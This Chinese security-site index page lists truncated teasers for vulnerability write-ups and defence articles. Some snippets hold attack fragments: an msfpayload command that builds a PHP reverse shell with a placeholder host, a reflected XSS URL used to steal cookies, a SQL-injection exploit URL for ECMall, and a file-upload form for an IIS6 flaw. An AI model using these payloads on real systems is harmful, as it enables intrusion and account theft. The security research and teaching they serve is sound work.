微信任意用户密码修改漏洞(已修复) - 网站安全关注热度:16

今天发现个微信群发的漏洞.还没玩.就被修补了.于是就有了这个漏洞的产生.同样问题产生在重置用户密码的环节.在微信官方的首页上发现新增了如下功能模块在这个页面输入一个已经注..[详情]

WEB程序的安全防御机制(二） - 网站安全 - 自学关注热度:15

2、处理用户的输入我们要这样认为，所有的用户输入都不可信。如何安全地处理用户输入是防御攻击的一个很关键的要求。一般的WEB程序都会在前台页面做输入确认（一般是js验证），..[详情]

WEB程序的安全防御机制(一） - 网站安全 - 自学关注热度:20

互联网上的WEB程序需要大量的安全机制来防御攻击。安全机制主要有：①处理用户的访问WEB的功能和数据，防止未授权访问。②处理用户的输入，防止用户的错误输入对程序造成影响。..[详情]

反射型xss明打十九楼各种超级版主 - 网站安全关注热度:20

1.首先找到十九楼一个反射型xss：http://www.19lou.com/search/user?ageType=4searchType=usergender=scriptalert(1)/scriptkeyword=111122222221配合获取cookie的一个js，将cookie发送到我的服务器上2.然.....[详情]

jsp和php的webshell反弹shell方法 - 网站安全 - 自学关注热度:16

1 .生成WEBSHELL文件msf msfpayload php/reverse_php LHOST=你的IP LPORT=端口 R XX.php我的BT4是在/ROOT/ 目录 然后吧dis9.php加 才能运行把dis9.php传进你的SHELL里 例如 www.XXX.com/XX.ph.....[详情]

WordPress站点安全解决方案–你的WordPress站点安全关注热度:11

随着WordPress由博客系统转型为CMS系统，再加上无限的资源和个性化主题、插件可供用户选择，国内越来越多的用户开始使用WordPress搭建自己的博客、CMS站点，甚至于企业站点。但是搭建..[详情]

Sitecom Home Storage Center认证绕过 - 网站安全 - 自学关注热度:23

Security Advisory AA-006: Authorization Bypass Vulnerability in Password Reset Function Sitecom Home Storage Center (0-day)缺陷类型：Authorization Bypass危害：System AccessEase of.....[详情]

ECMall 2.x 两枚注射及修复 - 网站安全 - 自学php关注热度:17

Fuck one : \app\my_goods.app.php (2290行)Fuck one EXP 注册个会员-登录-提交以下即可http://site/index.php?app=my_goodsact=brand_editid=1 and(select 1 from(select count(*),concat((select.....[详情]

HTML5安全风险详析之二：Web Storage攻击 - 网站安全关注热度:24

上文：http://www.2cto.com/Article/201209/154081.html一、WebStorage简介 HTML5支持WebStorage，开发者可以为应用创建本地存储，存储一些有用的信息。例如LocalStorage可以长期存储，而且存放空间很大，..[详情]

HTML5安全风险详析之一：CORS攻击 - 网站安全 - 自关注热度:23

一、从SOP到CORS SOP就是Same Origin Policy同源策略，指一个域的文档或脚本，不能获取或修改另一个域的文档的属性。也就是Ajax不能跨域访问，我们之前的Web资源访问的根本策略都是建立在..[详情]

HTML5安全：CORS（跨域资源共享）简介 - 网站安全关注热度:22

前言：像CORS对于现代前端这么重要的技术在国内基本上居然很少有人使用和提及，在百度或者Google上搜索CORS，搜到的中文文章基本都是另外一种卫星定位技术CORS的介绍，让我等前端同..[详情]

mysql order by类型注射利用笔记 - 网站安全 - 自学关注热度:11

order by的注射也发生在表名的注射等的好处是一般不需要考虑magic_quotes_gpc等因素的影响,网上搜了下有一些盲注的利用方法,自己也测试了一下,发现可以直接利用mysql报错来注射,干净利落..[详情]

腾讯邮箱储存型xss复现利用及修复 - 网站安全关注热度:14

1.前面的构造流程是一样的 ，先是构造jpg2.将构造好的jpg发送到任意好友的qq邮箱3.获得对方能看到的图片地址发送成功后点击查看此邮件得到图片地址测试得到的地址在发送方qq邮箱登陆..[详情]

cmseasy文件上传+IIS6解释漏洞 - 网站安全 - 自学关注热度:22

漏洞文件：celive\live\doajaxfileupload.phpform enctype=multipart/form-data method=post action=http://www.cmseasy.cn/celive/live/doajaxfileupload.phpinput type=file name=fileToUplo.....[详情]

Cannonbolt Portfolio Manager v1.0存储型XSS及注射 - 网站关注热度:13

Cannonbolt Portfolio Manager v1.0 Stored XSS and SQL Injection Vulnerabilities作者: IWCn Systems Inc.官方网站: http://www.iwcn.ws影响版本: 1.0摘要:Cannonbolt Portfolio Manager is .....[详情]